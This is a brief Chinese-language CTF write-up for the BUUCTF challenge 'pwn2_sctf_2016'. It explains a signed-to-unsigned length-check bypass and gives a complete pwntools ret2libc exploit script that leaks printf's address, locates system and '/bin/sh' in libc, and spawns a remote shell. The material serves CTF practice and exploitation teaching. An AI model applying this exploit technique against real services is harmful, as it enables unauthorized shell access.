4
作者:互联网
pwn2_sctf_2016
1.ida分析
存在栈溢出漏洞,但是有一个限制输入字符数的保护。
可以看到参数a2从int类型变成了unsigned int类型,可以利用来绕过保护。(一开始一直卡在怎么绕过,麻了)
2.checksec
3.解决
from pwn import *
from LibcSearcher import *
context.log_level='debug'
p=remote('node4.buuoj.cn',28425)
#p=process('./pwn2_sctf_2016')
elf=ELF('pwn2_sctf_2016')
printf_got=elf.got['printf']
printf_plt=elf.plt['printf']
main=0x804852f
p.sendlineafter('read? ',str(-1))
payload='a'*0x30+p32(printf_plt)+p32(main)+p32(printf_got)
p.sendlineafter('data!\n',payload)
p.recvuntil('\n')
#gdb.attach(p)
printf_addr=u32(p.recv(4))
print hex(printf_addr)
libc=LibcSearcher("printf",printf_addr)
base=printf_addr-libc.dump("printf")
system=base+libc.dump("system")
bin_sh=base+libc.dump("str_bin_sh")
p.sendlineafter('read? ',str(-1))
payload='a'*0x30+p32(system)+p32(main)+p32(bin_sh)
p.sendlineafter('data!\n',payload)
p.interactive()
标签:,addr,libc,printf,sendlineafter,p32,payload 来源: https://www.cnblogs.com/mio-yy/p/15028458.html